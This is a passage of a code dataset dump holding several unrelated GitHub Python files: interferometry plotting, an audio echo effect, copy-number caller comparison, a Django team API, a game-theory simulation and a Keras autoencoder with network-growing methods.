night_dic['wave_vis'],cmap = 'Spectral_r')\n            axis.set_ylim(0.85,1.15)\n            axis.set_title(f'Vis2 for the night of the {formatted_night}')\n            axis.errorbar(freqs,vis2, yerr=vis2_err,ecolor='darkgrey', linestyle='', marker=None, mew=0)#,**error_kwargs )\n            axis.set_xlabel(r'f ($\lambda . 
rad^{-1})$')\n            axis.set_ylabel(r'Vis2')\n\n\n        return im1\n    \n    def plot_uv_plane(self,axis,units,night = None):\n        formatted_night = f'{night.day}/{night.month}/{night.year}'\n        night_dic = self.obs_obj.get_data_by_night(night)\n        \n        B_u, B_v = night_dic['u'],night_dic['v']\n        f_u, f_v = B_u/np.array(night_dic['wave_vis']), B_v/np.array(night_dic['wave_vis'])\n        \n        if units == 'm':\n            im1 = axis.scatter(B_u,B_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n            im2 = axis.scatter(-B_u,-B_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n            axis.set_title(f'uv plane for the night of {formatted_night}')\n            axis.set_xlabel(r'u (m)')\n            axis.set_ylabel(r'v (m)')\n\n\n            # axis.set_ylim(0,1.5)\n        else:\n            im1 = axis.scatter(f_u,f_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n            im2 = axis.scatter(-f_u,-f_v, c= night_dic['wave_vis'],cmap = 'Spectral_r')\n            axis.set_title(f'uv plane for the night of {formatted_night}')\n            axis.set_xlabel(r'u ($\lambda . rad^{-1})$')\n            axis.set_ylabel(r'v ($\lambda . rad^{-1})$')\n        \n        return im1, im2\n    def plot_all(self,units='m',save=True, save_path = ''):\n        ## Units: can be meters (m) or spatial frequencies (f)\n        \n        fig, axis = plt.subplots(len(self.nights),2,gridspec_kw={'width_ratios': [1, 2]})\n        fig.set_size_inches(22,6*len(self.nights))\n        fig.tight_layout(pad=6)\n        im = []\n        if len(self.nights)==1:\n            for i, night in enumerate(self.nights):\n                im1 = self.plot_vis(axis[1],units,night)\n                im2,im3 = self.plot_uv_plane(axis[0],units,night)\n                im.append(im1)\n                im.append(im2)\n\n        else:\n            for i, night in enumerate(self.nights):\n                im1 = self.plot_vis(axis[i,1],units,night)\n                im2,im3 = self.plot_uv_plane(axis[i,0],units,night)\n                im.append(im1)\n                im.append(im2)\n            \n            for ax in axis[:,1]:\n                fig.colorbar(im[i], ax=ax)\n\n        last_obs_date = self.nights[-1]\n        fig.suptitle(f\"Observations of {self.obs_dic['Target_name']}\", fontsize=25)\n        if save:\n            plt.savefig(save_path + f\"{self.obs_dic['Target_name']}_observations_{last_obs_date.month}_{last_obs_date.year}.png\")\n","repo_name":"Philippepr08/STAGE_M2","sub_path":"observation_plotter.py","file_name":"observation_plotter.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39605250942","text":"import numpy as np\nimport soundfile as sf\n\n\ndef delay(xn, a, d, af, n):\n    \"\"\"Input parameters\n    xn = input signal\n    a = amplitude of the delayed signal\n    d = delay time (in samples)\n    af = amplitude of the feedback signal\n    n = number of delays\n    \"\"\"\n    l = len(xn)\n    for i in range(n):\n        if i == 0:\n            delay = a*(np.hstack((np.zeros(d), xn)))\n            delay2 = af * (np.hstack((np.zeros(d), delay)))\n            delay = np.hstack((delay, np.zeros(d)))\n            xn = np.hstack((xn, np.zeros(2*d)))\n            delay = delay + delay2\n        else:\n            delay = a*(np.hstack((np.zeros(d), delay)))\n            delay2 = af*(np.hstack((np.zeros(d), delay)))\n            delay = np.hstack((delay, np.zeros(d)))\n            delay = delay+delay2\n            xn = np.hstack((xn, np.zeros(2*d)))\n            delay = delay + delay2\n    delay = xn + delay\n    return delay\n\n\nfs = 44100\nxn, fs = sf.read('Midi69.wav')\n'number of repetitions'\nn = 2\n'delayed samples'\nd = round(0.5 * fs)\n'amplitude of the delays'\na = 0.5\n'feedback amplitude'\naf = 0.5\nsynth = delay(xn, a, d, af, n)\nsf.write('echo.wav', synth, fs)\n","repo_name":"PabloRO07/SIUNTREF","sub_path":"Dsp/TP2 Karplus-Strong/feedback.py","file_name":"feedback.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
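# Editor's note: a compact, illustrative alternative to the block-based echo in
# the record above -- a sample-by-sample feedback comb (y[n] = x[n] + a*y[n-d]);
# the amplitude, delay and tail-length values are assumptions, not taken from
# the original.
import numpy as np

def comb_echo(x, a=0.5, d=22050, tail=5):
    y = np.zeros(len(x) + tail * d)
    y[: len(x)] = x
    for i in range(d, len(y)):
        y[i] += a * y[i - d]  # each echo feeds back into the next one
    return y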
+{"seq_id":"27512385535","text":"import sbg_cveto_util as cveto\nimport pandas as pd\nfrom collections import Counter\nimport itertools\nimport matplotlib.pyplot as plt\nimport seaborn as sb\n\n\n# Read ploidy\ndef read_purple_ploidy(path):\n skiprows = 0\n header = 0\n sep = '\\t'\n comment = '#'\n df = pd.read_csv(filepath_or_buffer=path, skiprows=skiprows,\n header=header, comment=comment, sep=sep,\n dtype={\"ploidy\": float, \"purity\": float})\n ploidy = df['ploidy'][0]\n ploidy_to_return = round(float(ploidy), 2)\n\n return ploidy_to_return\n\n\ndef read_controlfreec_ploidy(path):\n ploidy = 2\n with open(path) as openfile:\n for line in openfile:\n if 'Output_Ploidy' in line:\n parts = line.split('\\t')\n ploidy = float(parts[1].split('\\n')[0])\n\n return ploidy\n return ploidy\n\n\ndef read_sclust_ploidy(path):\n f = open(path, \"r\")\n header_line = f.readline()\n header_indexes = header_line.split('\\t')\n value_line = f.readline()\n value_indexes = value_line.split('\\t')\n data_dict = dict(zip(header_indexes, value_indexes))\n ploidy_value = (data_dict['ploidy'])\n ploidy = float(ploidy_value)\n ploidy = int(ploidy)\n return ploidy\n\n\ndef read_facets_ploidy(path):\n skiprows = 0\n header = 0\n sep = '\\t'\n comment = '#'\n df = pd.read_csv(filepath_or_buffer=path, skiprows=skiprows,\n header=header, comment=comment, sep=sep)\n ploidy = df['ploidy'][0]\n ploidy_to_return = round(float(ploidy), 2)\n\n return ploidy_to_return\n\n\n# Additional methods\n\ndef load_file(cnv_file, name):\n caller = name\n df, ploidy = cveto.read_csv(cnv_file, caller, None)\n\n # Remove CHR, Chr, chr from chromosome name\n # This also ensures that X is X and not x\n df['chromosome'] = df['chromosome'].str.upper().str.replace('CHR', '')\n\n # Keep 1, 2, ... 22, X chromosomes\n valid_chroms = (\n '1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 X Y'.split()\n )\n cond = df['chromosome'].isin(valid_chroms)\n df = df[cond]\n\n return df, cveto.to_regions(df), ploidy\n\n\ndef delete_small_and_na_regions(df):\n df = df.drop(df[df.length == 1.0].index)\n df['length'] = pd.to_numeric(df.length, errors='coerce')\n df.dropna(inplace=True)\n return df\n\n\ndef calculate_stats_total(df, column_name_part, tumor, stats_type):\n groups = [col for col in df.columns if column_name_part in col]\n stats = df.groupby(groups).agg({'length': 'sum'})\n stats.to_csv('{}_{}.STATS.csv'.format(stats_type, tumor))\n return stats\n\n\ndef calculate_stats_per_file(stats, column):\n stats = stats.reset_index().groupby(column).sum()\n stats.to_csv('{}_.STATS_per_file.csv'.format(column))\n return stats\n\n\ndef delete_chr_start_end_columns(df):\n df.drop('chromosome', inplace=True, axis=1)\n df.drop('start', inplace=True, axis=1)\n df.drop('end', inplace=True, axis=1)\n\n\ndef delete_status_columns(df):\n for column in df.columns:\n if '_status' in column:\n df.drop(column, inplace=True, axis=1)\n\n\ndef adjust_values_to_nearest(df_old, df_new, all_values, column):\n caller_values = []\n for index, value in df_old[column].items():\n if value not in all_values:\n closest_value = min(all_values, key=lambda x: abs(x - value))\n df_new.at[index, column] = closest_value\n caller_values.append(closest_value)\n else:\n caller_values.append(value)\n return df_new, caller_values\n\n\ndef create_combination_of_columns_list(df):\n callers_to_combine = []\n for column in df.columns:\n if 'length' not in column:\n callers_to_combine.append(column)\n callers_to_combine_list = list(\n itertools.combinations(callers_to_combine, 2))\n 
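# e.g. with df.columns == ['facets_cn', 'purple_cn', 'sclust_cn', 'length'] this\n    # yields three caller pairs: (facets, purple), (facets, sclust), (purple, sclust).\n    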
return callers_to_combine_list\n\n\ndef create_heatmap(caller_one, caller_two, df, tumor, method):\n    src = df.groupby([caller_one, caller_two]).agg({'length': 'sum'})\n    src = src.unstack(level=0)\n    src.columns = src.columns.get_level_values(1)\n    src.fillna(0, inplace=True)\n    fig, ax = plt.subplots(figsize=(11, 9))\n    # plot heatmap\n    if str(method) == 'STATUS':\n        annot = True\n        title = 'Comparison of statuses per length from two files'\n    else:\n        annot = False\n        title = 'Comparison of cr values per length from two files'\n    ay = sb.heatmap(src, cmap=\"Blues\", linewidth=0.3,\n                    cbar_kws={\"shrink\": .8, 'label': 'Length'}, annot=annot)\n    ay.invert_yaxis()\n    plt.xlabel(caller_one)\n    plt.ylabel(caller_two)\n    plt.title(title)\n    plt.savefig(\n        '{}_{}_{}_{}.heatmap.png'.format(caller_one, caller_two, method,\n                                         tumor))\n    plt.close(fig)\n    return src\n\n\n# Interpret\n\n\ndef get_callers_index(df):\n    list_of_callers_index = []\n    for i in range(0, len(df.columns)):\n        if '_status' in df.columns[i]:\n            list_of_callers_index.append(i)\n    return list_of_callers_index\n\n\ndef precise_call(row, list_of_callers_index):\n    \"\"\"\n    Return value is ambiguous if not all callers agree on it.\n    \"\"\"\n    all_calls = []\n    for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n        all_calls.append(row[i])\n    c = Counter(all_calls)\n    if len(c.most_common()) > 1:\n        return 'ambiguous'\n    else:\n        value, count = c.most_common()[0]\n        return value\n\n\ndef majority_call(row, list_of_callers_index):\n    \"\"\"\n    Return value is the most common value. If two values are most common, result is ambiguous.\n    \"\"\"\n    all_calls = []\n    for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n        all_calls.append(row[i])\n    c = Counter(all_calls)\n    if len(c.most_common()) > 1:\n        if not (c.most_common()[0][1] == c.most_common()[1][1]):\n            value, count = c.most_common()[0]\n            return value\n        else:\n            return 'ambiguous'\n    else:\n        value, count = c.most_common()[0]\n        return value\n\n\n
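# Editor's note: how the Counter logic above resolves majorities and ties\n# (the call values are illustrative only).\nassert Counter(['gain', 'gain', 'loss']).most_common()[0] == ('gain', 2)  # clear majority\n_tie = Counter(['gain', 'loss']).most_common()\nassert _tie[0][1] == _tie[1][1]  # tied top counts -> majority_call returns 'ambiguous'\n\n\n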
def delete_ambiguous_regions(df, tumor, interpret_method):\n    df = df.drop(df[df.final_call == 'ambiguous'].index)\n    if interpret_method == 'MAJORITY':\n        add = 'majority_calls'\n    elif interpret_method == 'PRECISE':\n        add = 'precise_calls'\n    else:\n        add = 'undefined'\n    df.to_csv('{}.{}.{}.FINAL_result.csv'.format(tumor, interpret_method, add))\n\n\ndef segment_regions(df_new, df_old, tumor, interpret_method):\n    for row in df_old.iterrows():\n        index_old = row[0]  # index of old df\n        if df_new.empty:\n            index_new = 0\n            df_new.loc[df_old.index[index_new]] = df_old.iloc[index_old]\n            continue\n        if df_old['chromosome'].iloc[index_old] == df_new['chromosome'].iloc[\n            index_new  # this will work because it will\n            # always go through the first if\n        ]:\n            final_call_old = df_old['final_call'].iloc[index_old]\n            final_call_new = df_new['final_call'].iloc[index_new]\n            if final_call_old == final_call_new:\n                df_new.at[df_new.index[index_new], 'end'] = (\n                    df_old.iloc[index_old]['end']\n                )\n                df_new.at[df_new.index[index_new], 'length'] = (\n                    df_old.iloc[index_old]['end'] - df_new.iloc[index_new][\n                        'start']\n                )\n            else:\n                df_new.loc[df_new.index.max() + 1] = df_old.iloc[index_old]\n                index_new = index_new + 1\n        else:\n            df_new.loc[df_new.index.max() + 1] = df_old.iloc[index_old]\n            index_new = index_new + 1\n    df_new.to_csv(\n        '{}_{}.seg_with_ambiguous.csv'.format(tumor, interpret_method))\n    return df_new\n\n\n# Plotly visualisations\ndef final_call(row, list_of_callers_index):\n    all_calls = []\n    for i in range(min(list_of_callers_index), max(list_of_callers_index) + 1):\n        all_calls.append(row[i])\n    all_calls.sort()\n    return '-'.join(all_calls)\n    \ndef calculate_metrics_for_benchmark(callers, df_calculate_metrics):\n    \"\"\"\n    This should be run to calculate metrics when benchmarking multiple callers.\n    \"\"\"\n    import json\n    truth_combinations = []\n    # Create combinations of all samples\n    callers_to_combine_total = list(itertools.combinations(callers, 2))\n    # Leave only combinations with truth set\n    for callers_pair in callers_to_combine_total:\n        for caller_name in callers_pair:\n            if 'truth' in caller_name.lower():\n                truth_combinations.append(list(callers_pair))\n\n    metrics_dict = {}\n    for truth_combination_pair in truth_combinations:\n        # set truth set to be the first element in the list\n        if 'truth' in truth_combination_pair[1].lower():\n            truth_combination_pair[0], truth_combination_pair[1] = truth_combination_pair[1], truth_combination_pair[0]\n        # Set correct column name\n        for column in df_calculate_metrics.columns:\n            if truth_combination_pair[0] in column:\n                truth_column = ('_'.join(column.split('_')[:-1]))\n            if truth_combination_pair[1] in column:\n                caller_column = ('_'.join(column.split('_')[:-1]))\n        # calculate metrics\n        metrics_dict[truth_combination_pair[1]] = cveto.calculate_metrics(\n            df_calculate_metrics, truth_column, caller_column\n        )\n        metrics_dict[truth_combination_pair[1]] = metrics_dict[truth_combination_pair[1]].to_dict()\n    with open('benchmark_metrics.json', 'w') as metrics:\n        json.dump(metrics_dict, metrics)\n    df = pd.read_json('benchmark_metrics.json')\n    df.to_csv('benchmark_metrics.csv')","repo_name":"kids-first/kf-somatic-workflow","sub_path":"scripts/sbg_multicnv_methods.py","file_name":"sbg_multicnv_methods.py","file_ext":"py","file_size_in_byte":9658,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"4591734752","text":"import pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#train data\nfb = pd.read_csv('/datasets/dataset_facebook_cosmetics.csv', sep = ';')\n\n#data crop\nX = fb.drop('Total Interactions', axis = 1)\ny = fb['Total Interactions']\n\nmodel = RandomForestRegressor()\n\n#ML\nmodel.fit(X, y)\n\n#prediction\npredictions = model.predict(X)\n\n#show plot\nsns.scatterplot(y, predictions, s = 15, alpha = 0.6)\nplt.title('Forecast vs. actual')\nplt.ylabel('Forecast')\nplt.xlabel('Actual')\nplt.show()\n\n##I: clearly overfitting, plus the test uses the same data","repo_name":"Saramag256/WP_vandal_control","sub_path":"apicache-py3/ML/Test Binary.py","file_name":"Test Binary.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29570117176","text":"def pig_latin(words):\n    reply = []\n    for word in words:\n        i = 0\n        for a in word:\n            if a in \"aeiou\":\n                break\n            i += 1\n        if i == 0:\n            piggy = word + \"yay\"\n        else:\n            piggy = word[i:] + word[:i] + \"ay\"\n        if word[:1].isupper():\n            piggy = piggy.title()\n        reply.append(piggy)\n    print(reply)\n    return reply\n\n# while True:\n#     pig = input(\"Enter word to translate into pig latin: \")\n#     pig_latin(pig)\n\n","repo_name":"succinction/Python","sub_path":"pig_latin.py","file_name":"pig_latin.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
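# Editor's note: two worked cases for pig_latin above (the function both prints
# and returns the translated list).
assert pig_latin(["Hello", "apple"]) == ["Ellohay", "appleyay"]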
+{"seq_id":"30528566804","text":"from game import *\n\n\nclass RecognitionGame(Game):\n    \"\"\"\n    Similar to the standard disclosure game, but the true drinking type\n    is only revealed after a referral, which ends the game.\n    In addition, signallers can only fuzzily differentiate between responder types.\n    Observing a social payoff that could come from any responder type will not allow\n    an update.\n    Observing one that could come from 2 types is evidence for both.\n    Observing a unique response constitutes a type revelation.\n    \"\"\"\n\n    def name(self):\n        return \"recognition\"\n\n    def play_round(self, signaller, receiver):\n        \"\"\" Play a round of this game between the\n        two players.\n        \"\"\"\n        signal = signaller.do_signal(receiver)\n        act = receiver.respond(signal, opponent=signaller)\n        signal_payoff = self.woman_baby_payoff[signaller.player_type][act] + self.woman_social_payoff[signal][receiver.player_type]\n        receive_payoff = self.midwife_payoff[signaller.player_type][act]\n\n        signaller.accrued_payoffs += signal_payoff\n        receiver.accrued_payoffs += receive_payoff\n\n        #Signaller learns something about the type\n        social = self.woman_social_payoff[signal][receiver.player_type]\n\n        possible_types = []\n\n        for i in range(len(self.woman_social_payoff[signal])):\n            if social == self.woman_social_payoff[signal][i]:\n                possible_types.append(i)\n        #True type is known\n        if len(possible_types) == 1:\n            signaller.update_beliefs(act, receiver, signal_payoff)\n        else:\n            try:\n                signaller.fuzzy_update_beliefs(act, receiver, signal_payoff, possible_types)\n            except AttributeError:\n                # Must be a payoff type agent. \n                pass\n        #But the responder doesn't unless they referred\n        if act == 1:\n            receiver.update_beliefs(receive_payoff, signaller, signal)\n            signaller.is_finished = True\n        else:\n            receiver.rounds -= 1\n\n\nclass CaseloadRecognitionGame(CaseloadGame, RecognitionGame):\n    \"\"\"\n    Identical with the regular recognition game, but uses caseloading to assign\n    women to midwives.\n    \"\"\"\n","repo_name":"greenape/disclosure-game","sub_path":"python/disclosuregame/disclosuregame/Games/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"14338086322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Name: Elmer Rodriguez\n# Institution: University of Rochester\n# Professor: Richard Sarkis\n# Course: CSC 161: INTRO TO PROGRAMMING\n# Assignment: Computer and Programs\n# All Rights Reserved\n\n\n# File: lab_computer_programs.py\n# A simple program illustrating chaotic behavior.\n\n#Defining the main function\ndef main():\n\n    #Printing a line to the user in order to provide some context for the program\n    print(\"\\nThis program illustrates a chaotic function\")\n    #The following line is asking the user \"How many numbers should the program print?\" and storing that information in the variable (n)\n    n = int(input(\"How many numbers should I print? \"))\n    #The following line is asking the user \"Enter a number between 0 and 1:\" and storing that information in the variable (x)\n    x = float(input(\"Enter a number between 0 and 1: \"))\n    #Running a loop within the parameters provided by the user (n) and printing an output stored in the variable (x)\n    for i in range(n):\n        x = 3.9 * x * (1 - x)\n        print(x)\n\n#calling the main function\nmain()\n","repo_name":"erodri17/Python3","sub_path":"lab_computer_programs.py","file_name":"lab_computer_programs.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33602677213","text":"from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import Team\nfrom .serializers import TeamSerialiser\n\nfrom django.http import HttpResponse\n\n\n@api_view(['POST'])\ndef create_team(request):\n    if (request.user.is_authenticated is False):\n        return Response(\"User not authenticated\", status=403)\n    else:\n        serialiser = TeamSerialiser(data=request.data)\n        if serialiser.is_valid():\n            serialiser.save()\n            return Response(serialiser.data, status=200)\n        else:\n            return Response(serialiser.errors, status=400)\n\n\n@api_view(['GET'])\ndef get_team(request, team_id):\n    team = Team.objects.get(team_id=team_id)\n    serializer = TeamSerialiser(team)\n    return Response(serializer.data, status=200)\n\n\n@api_view(['GET'])\ndef get_teams(request):\n    teams = Team.objects.all()\n    serializer = TeamSerialiser(teams, many=True)\n    return Response(serializer.data, status=200)\n\n\n@api_view(['PUT'])\ndef update_team(request, team_id):\n    if request.user.is_authenticated is False:\n        return Response(\"User not authenticated\", status=403)\n    else:\n        team = Team.objects.get(team_id=team_id)\n        team_name_formatted = f\"{team.name} - {team.join_code}\"\n        if (str(request.user.team_id) != str(team_name_formatted)):\n            return HttpResponse(\"User isn't authenticated to make changes to this team\", status=403)\n        else:\n            if (request.user.team_admin is False):\n                return HttpResponse(\"User isn't an admin of this team\", status=403)\n            else:\n                serializer = TeamSerialiser(instance=team, data=request.data)\n                if serializer.is_valid():\n                    serializer.save()\n                    return Response(serializer.data, status=200)\n                else:\n                    return Response(serializer.errors, status=400)\n\n\n@api_view(['DELETE'])\ndef delete_team(request, team_id):\n    if (request.user.is_authenticated is False):\n        return Response(\"User is not authenticated\", status=403)\n    else:\n        team = Team.objects.get(team_id=team_id)\n        team_name_formatted = f\"{team.name} - {team.join_code}\"\n        if (str(request.user.team_id) != str(team_name_formatted) and request.user.team_admin is False):\n            return Response(\"User is not authorised to delete this team\", status=403)\n        else:\n            team.delete()\n            request.user.team_admin = False\n            request.user.team_id = None\n            request.user.save()\n            return Response(\"Team successfully deleted\", status=200)\n","repo_name":"codersforcauses/csf","sub_path":"server/api/team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"12702746423","text":"import tensorflow as tf\nfrom tensorflow.keras.layers import Layer, Dense\nfrom tensorflow.keras import Model, regularizers, initializers\nimport numpy as np\nimport json\n\nfrom tensorflow.python.training.tracking.data_structures import NoDependency\n\nfrom utils.net2net import 
net2wider, net2deeper\n\n\n# https://github.com/paulpjoby/DynGEM\nclass PartCoder(Layer):\n def __init__(self, input_dim, output_dim=2, hidden_dims=None, l1=0.01, l2=0.01, seed=6):\n super(PartCoder, self).__init__()\n self.l1 = l1\n self.l2 = l2\n self.seed = seed\n # self.layers = NoDependency([])\n # self.__dict__['layers'] = []\n self.layers = []\n\n _input_dim = input_dim\n for i, dim in enumerate(hidden_dims):\n layer = Dense(\n units=dim,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, _input_dim))\n _input_dim = dim\n self.layers.append(layer)\n\n # Final, adding output_layer (latent/reconstruction layer)\n layer = Dense(\n units=output_dim,\n activation=tf.nn.sigmoid,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=6),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, _input_dim))\n self.layers.append(layer)\n\n def wider(self, added_size=1, pos_layer=None):\n layers_size = len(self.layers)\n if layers_size < 2:\n raise ValueError(\"Number of layer must be greater than 2.\")\n if pos_layer is None:\n pos_layer = max(layers_size - 2, 0)\n elif pos_layer >= layers_size - 1 or pos_layer < 0:\n raise ValueError(\n f\"pos_layer is expected less than length of layers (pos_layer in [0, layers_size-2])\")\n\n # TODO: get biggest value to divide for new weights\n weights, bias = self.layers[pos_layer].get_weights()\n weights_next_layer, bias_next_layer = self.layers[pos_layer + 1].get_weights()\n\n new_weights, new_bias, new_weights_next_layer = net2wider(weights, bias, weights_next_layer, added_size)\n\n src_units, des_units = weights.shape[0], weights.shape[1] + added_size\n next_des_units = weights_next_layer.shape[1]\n\n wider_layer = Dense(\n units=des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2)\n )\n\n # input_shape = (batch_size, input_features).\n # input_features = number of units in layer = length(layer) = output of previous layer\n wider_layer.build(input_shape=(None, src_units))\n wider_layer.set_weights([new_weights, new_bias])\n\n next_layer = Dense(\n units=next_des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2)\n )\n next_layer.build(input_shape=(None, des_units))\n next_layer.set_weights([new_weights_next_layer, bias_next_layer])\n\n self.layers[pos_layer] = wider_layer\n self.layers[pos_layer + 1] = next_layer\n\n def deeper(self, pos_layer=None):\n layers_size = len(self.layers)\n if pos_layer is None:\n pos_layer = max(layers_size - 2, 0)\n elif pos_layer >= layers_size - 1 or pos_layer < 0:\n raise ValueError(\n f\"pos_layer is expected less than length of layers (pos_layer in [0, layers_size-2]).\")\n\n weights, bias = self.layers[pos_layer].get_weights()\n new_weights, new_bias = net2deeper(weights)\n des_units = weights.shape[1]\n # TODO: add initial kernel\n layer = Dense(\n units=des_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n )\n layer.build(input_shape=(None, des_units))\n layer.set_weights([new_weights, new_bias])\n\n self.layers.insert(pos_layer + 1, layer)\n\n def set_dump_weight(self, dum_weight=None):\n for i in range(len(self.layers)):\n w, b = self.layers[i].get_weights()\n\n for u in range(w.shape[0]):\n for v in 
range(w.shape[1]):\n if dum_weight is None:\n w[u][v] = u * w.shape[1] + v\n else:\n w[u][v] = dum_weight\n for v in range(b.shape[0]):\n b[v] = v\n if dum_weight is None:\n b[v] = v\n else:\n b[v] = dum_weight\n\n self.layers[i].set_weights([w, b])\n\n def call(self, inputs):\n z = inputs\n for layer in self.layers:\n z = layer(z)\n\n return z\n\n def info(self, show_weight=False, show_config=False):\n print(f\"{self.name}\\n----------\")\n print(f\"Number of layers: {len(self.layers)}\")\n for i, layer in enumerate(self.layers):\n print(f\"Layer {i + 1}\\n\\t Name={layer.name}\\n\\t Shape ={layer.get_weights()[0].shape}\")\n if show_weight:\n print(f\"\\t Weight= {layer.get_weights()}\")\n if show_config:\n print(f\"Config: {json.dumps(layer.get_config(), sort_keys=True, indent=4)}\")\n\n def get_length_layers(self):\n return len(self.layers)\n\n def begin_insert_layer(self, layer_dim):\n # `self.layers[0].get_weights()` -> [weights, bias]\n next_units = self.layers[0].get_weights()[0].shape[0]\n layer = Dense(\n units=next_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n layer.build(input_shape=(None, layer_dim))\n self.layers.insert(0, layer)\n\n def last_insert_layer(self, layer_dim):\n prev_weights, prev_bias = self.layers[len(self.layers) - 1].get_weights()\n prev_units = prev_weights.shape[1]\n\n replace_prev_layer = Dense(\n units=prev_units,\n activation=tf.nn.relu,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n )\n replace_prev_layer.build(input_shape=(None, prev_weights.shape[0]))\n replace_prev_layer.set_weights([prev_weights, prev_bias])\n\n added_layer = Dense(\n units=layer_dim,\n activation=tf.nn.sigmoid,\n kernel_regularizer=regularizers.l1_l2(l1=self.l1, l2=self.l2),\n kernel_initializer=initializers.GlorotNormal(seed=self.seed),\n bias_initializer=initializers.Zeros()\n )\n added_layer.build(input_shape=(None, prev_units))\n\n del self.layers[len(self.layers) - 1]\n self.layers.append(replace_prev_layer)\n self.layers.append(added_layer)\n\n def get_layers_size(self):\n layers_size = []\n for layer in self.layers:\n weights, _ = layer.get_weights()\n layers_size.append(weights.shape)\n # print(\"layer_size: \", layers_size)\n return layers_size\n\n def get_weights(self):\n '''\n\n :return: [[weights, bias],[],...]\n '''\n layer_weights = []\n for layer in self.layers:\n layer_weights.append(layer.get_weights())\n return layer_weights\n\n def set_weights(self, weights):\n '''\n\n :param weights: [[weights, bias],[],...]\n :return:\n '''\n for i in range(0, len(self.layers)):\n # self.layers[i].build(input_shape=(None, weights[i][0].shape[1]))\n if not self.layers[i].get_weights():\n self.layers[i].build(input_shape=(None, len(weights[i][0])))\n self.layers[i].set_weights(weights[i])\n\n\nclass Autoencoder(Model):\n def __init__(self, input_dim, embedding_dim, hidden_dims=None, v1=0.01, v2=0.01):\n super(Autoencoder, self).__init__()\n self.input_dim = input_dim\n self.embedding_dim = embedding_dim\n\n if hidden_dims is None:\n hidden_dims = [512, 128]\n\n self.hidden_dims = hidden_dims\n self.l1 = v1\n self.l2 = v2\n\n self.encoder = PartCoder(input_dim=input_dim, output_dim=embedding_dim, hidden_dims=hidden_dims, l1=self.l1,\n l2=self.l2)\n self.decoder = PartCoder(input_dim=embedding_dim, output_dim=input_dim, hidden_dims=hidden_dims[::-1],\n l1=self.l1,\n l2=self.l2)\n\n def wider(self, 
added_size=1, pos_layer=None):\n if pos_layer is None:\n pos_layer = self.encoder.get_length_layers() - 2\n\n self.encoder.wider(added_size=added_size, pos_layer=pos_layer)\n self.decoder.wider(added_size=added_size, pos_layer=self.decoder.get_length_layers() - pos_layer - 2)\n\n def deeper(self, pos_layer=None):\n if pos_layer is None:\n pos_layer = self.encoder.get_length_layers() - 2\n\n self.encoder.deeper(pos_layer=pos_layer)\n self.decoder.deeper(pos_layer=self.decoder.get_length_layers() - pos_layer - 2)\n\n def call(self, inputs):\n Y = self.encoder(inputs)\n X_hat = self.decoder(Y)\n return X_hat, Y\n\n def get_embedding(self, inputs):\n return self.encoder(inputs)\n\n def get_reconstruction(self, inputs):\n return self.decoder(self.encoder(inputs))\n\n def info(self, show_weight=False, show_config=False):\n self.encoder.info(show_weight, show_config)\n self.decoder.info(show_weight, show_config)\n\n def expand_first_layer(self, layer_dim):\n self.input_dim = layer_dim\n self.encoder.begin_insert_layer(layer_dim=layer_dim)\n self.decoder.last_insert_layer(layer_dim=layer_dim)\n self.hidden_dims = self.get_hidden_dims()\n\n def get_layers_size(self):\n '''\n Return size of the encoder layers part. Suppose layers of decoder has same size as the encoder\n :return: layers size of encoder part\n '''\n return self.encoder.get_layers_size()\n\n def get_input_dim(self):\n return self.input_dim\n\n def set_dum_weight(self, dum_weight):\n self.encoder.set_dump_weight(dum_weight)\n self.decoder.set_dump_weight(dum_weight)\n\n def get_weights_model(self):\n '''\n Return a list of layer weights in the total of model\n :return: [[encoder_layer_weights],[decoder_layer_weights]]\n '''\n return [self.encoder.get_weights(), self.decoder.get_weights()]\n\n def set_weights_model(self, weights):\n encoder_weights, decoder_weights = weights\n self.encoder.set_weights(encoder_weights)\n self.decoder.set_weights(decoder_weights)\n\n def 